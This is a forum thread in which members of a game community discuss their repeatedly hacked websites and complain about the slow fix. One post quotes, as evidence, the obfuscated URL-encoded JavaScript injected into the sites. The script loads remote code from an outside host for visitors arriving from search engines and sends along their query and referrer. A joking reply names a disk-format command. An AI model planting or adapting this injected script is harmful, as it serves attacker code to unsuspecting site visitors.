SSC Forum script?

[PoLiX]

And hit again....

[Samapico]

Is it possible to shut down the site until it's resolved with the host? Well, especially for GetContinuum.com if it still is also attacked... People would start to think Continuum is a spyware or something

[RiiStar]

Edited May 24, 2009 by RiiStar

[Aceflyer]

The host is working on it. We've just gone through the next round of measures designed to secure the servers, and are now going to wait and see. Hopefully this will be the trick.

[PoLiX]

I would definately look at the forum script or any scripts on sscouncil.com or any related sites. See if any common scripting. Since GetContinuum doesn't seem to have gotten hit, it is more than likely they are abusing the same script over and over.

[Hakaku]

Well to point out, ALL of their websites are being attacked by it. It only takes a few seconds to check the source of all the websites to find that they're full of malicious scripts, even GetContinuum. The latter is the one that keeps getting restored the most often, as has been said in the other thread. The scripts so far have mainly attempted to add a hidden list of websites (aka adsttnmq1/sdioyslkjs2), but it won't be much longer, as indicated by the current source of getcontinuum.com, that the website will become a fake anti-virus webpage that attempts to install multiple viruses on your computer.

 

<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));

 

It's honestly really dissapointing to see such a slow response towards fixing this issue after now more than a month of having the websites hacked.

[Samapico]

format c:

[Aceflyer]

You guys are frustrated. Guess what- I'm frustrated, Mav's frustrated, and everyone else who's been involved with this is frustrated. The fact is there's nothing we can do directly, besides offer suggestions for fixes and restore the sites once they've been hacked. We've done the former- repeatedly- and each time the wait is for the host to implement said suggestions. We've (well, mostly Mav, actually) also done the latter more times than I can count and doing this does take time, and we're all busy people who can't just sit around waiting to restore the sites the moment they get re-hacked. So we're doing all we can. It's really not our fault the sites keep getting hacked, and I for one do not appreciate being accused of doing "dissapointing" work on this issue. All of us have spent a lot of time on this - time that we could've used to do something a lot more fun and enjoyable.